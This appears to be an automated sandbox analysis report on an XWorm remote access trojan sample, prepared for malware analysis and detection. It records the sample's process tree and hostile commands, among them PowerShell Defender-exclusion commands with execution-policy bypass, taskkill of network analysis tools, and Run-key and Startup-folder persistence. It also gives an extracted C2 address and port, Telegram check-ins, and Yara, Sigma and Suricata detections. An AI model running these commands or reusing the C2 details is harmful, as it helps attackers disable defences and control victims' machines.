Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe
Analysis ID:	1532749
MD5:	fddb1131547718b6b12670fedb027d98
SHA1:	75d8b7b092fa4309073e51b88bd754c1a9e311c6
SHA256:	4397855d87d996494adbf4e56b2c79071ce12c3e6790d289b02545627a6820dd
Tags:	exe
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Telegram RAT

Yara detected Telegram Recon

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Found direct / indirect Syscall (likely to bypass EDR)

Hides threads from debuggers

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect debuggers (CloseHandle check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to evade analysis by execution special instruction (VM detection)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe (PID: 7824 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe" MD5: FDDB1131547718B6B12670FEDB027D98)

MAXLEVLZ.exe (PID: 7936 cmdline: "C:\Users\user\AppData\Roaming\MAXLEVLZ.exe" MD5: 4AE50145B6509D7860D4DBDF52B67969)

conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7504 cmdline: cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 7576 cmdline: taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7528 cmdline: cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 1840 cmdline: taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 7628 cmdline: cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 6980 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 600 cmdline: cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

sc.exe (PID: 1076 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)

cmd.exe (PID: 2636 cmdline: cmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

taskkill.exe (PID: 6040 cmdline: taskkill /IM HTTPDebuggerSvc.exe /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

cmd.exe (PID: 3688 cmdline: cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

XClient.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 83194D1C0F097F273563914F9F693C2E)

powershell.exe (PID: 8136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

XClient.exe (PID: 2068 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 83194D1C0F097F273563914F9F693C2E)

XClient.exe (PID: 5136 cmdline: "C:\Users\user\AppData\Roaming\XClient.exe" MD5: 83194D1C0F097F273563914F9F693C2E)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["185.84.160.88"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_TelegramRecon	Yara detected Telegram Recon	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x900a:$s6: VirtualBox 0x8f68:$s8: Win32_ComputerSystem 0x9ad4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9b71:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9c86:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9666:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000004.00000000.1452452305.0000000000BC2000.00000002.00000001.01000000.00000007.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x8e0a:$s6: VirtualBox 0x8d68:$s8: Win32_ComputerSystem 0x98d4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9971:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9a86:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9466:$cnc4: POST / HTTP/1.1
00000004.00000002.2695394174.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1456183358.0000000005171000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x25db2:$s6: VirtualBox 0x30ff2:$s6: VirtualBox 0x25d10:$s8: Win32_ComputerSystem 0x30f50:$s8: Win32_ComputerSystem 0x2687c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x31abc:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x26919:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x31b59:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x26a2e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x31c6e:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x2640e:$cnc4: POST / HTTP/1.1 0x3164e:$cnc4: POST / HTTP/1.1
Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe PID: 7824	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe PID: 7824	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: XClient.exe PID: 7992	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: XClient.exe PID: 7992	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x720a:$s6: VirtualBox 0x7168:$s8: Win32_ComputerSystem 0x7cd4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7d71:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7e86:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7866:$cnc4: POST / HTTP/1.1
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
4.0.XClient.exe.bc0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
4.0.XClient.exe.bc0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
4.0.XClient.exe.bc0000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x900a:$s6: VirtualBox 0x8f68:$s8: Win32_ComputerSystem 0x9ad4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9b71:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9c86:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9666:$cnc4: POST / HTTP/1.1
4.0.XClient.exe.bc0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x900a:$s6: VirtualBox 0x8f68:$s8: Win32_ComputerSystem 0x9ad4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9b71:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9c86:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9666:$cnc4: POST / HTTP/1.1
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x720a:$s6: VirtualBox 0x7168:$s8: Win32_ComputerSystem 0x7cd4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7d71:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7e86:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7866:$cnc4: POST / HTTP/1.1
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x900a:$s6: VirtualBox 0x1424a:$s6: VirtualBox 0x8f68:$s8: Win32_ComputerSystem 0x141a8:$s8: Win32_ComputerSystem 0x9ad4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x14d14:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9b71:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14db1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9c86:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x14ec6:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x9666:$cnc4: POST / HTTP/1.1 0x148a6:$cnc4: POST / HTTP/1.1
Click to see the 13 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XClient.exe" , ParentImage: C:\Users\user\AppData\Roaming\XClient.exe, ParentProcessId: 7992, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe', ProcessId: 8136, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XClient.exe" , ParentImage: C:\Users\user\AppData\Roaming\XClient.exe, ParentProcessId: 7992, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe', ProcessId: 8136, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\XClient.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\XClient.exe, ProcessId: 7992, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\XClient.exe, ProcessId: 7992, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\XClient.exe" , ParentImage: C:\Users\user\AppData\Roaming\XClient.exe, ParentProcessId: 7992, ParentProcessName: XClient.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe', ProcessId: 8136, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm Checkin via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:36:06.785208+0200	2853685	1	A Network Trojan was detected	192.168.2.10	49708	149.154.167.220	443	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T21:36:39.917041+0200	2855924	1	Malware Command and Control Activity Detected	192.168.2.10	49710	185.84.160.88	7000	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\XClient.exe

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: 00000004.00000002.2695394174.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["185.84.160.88"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	ReversingLabs: Detection: 25%
Source: C:\Users\user\AppData\Roaming\XClient.exe	ReversingLabs: Detection: 87%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\MAXLEVLZ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\XClient.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: 185.84.160.88
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: 7000
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: <123456789>
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: <Xwormmm>
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: XWorm V5.4
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: USB.exe
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: %AppData%
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: XClient.exe
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: BTC_Address
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: ETH_Address
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: TRC20_Address
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: Your_Token
Source: 4.0.XClient.exe.bc0000.0.unpack	String decryptor: Your_ID

Source: MAXLEVLZ.exe, 00000002.00000002.1532288272.00007FF624E1D000.00000002.00000001.01000000.00000006.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_f749e0e7-f

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49708 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.10:49710 -> 185.84.160.88:7000
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.10:49708 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.84.160.88

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.5198fe8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.XClient.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.MulDrop23.34226.30433.19375.exe.518dda8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.10:49709 -> 185.84.160.88:7000

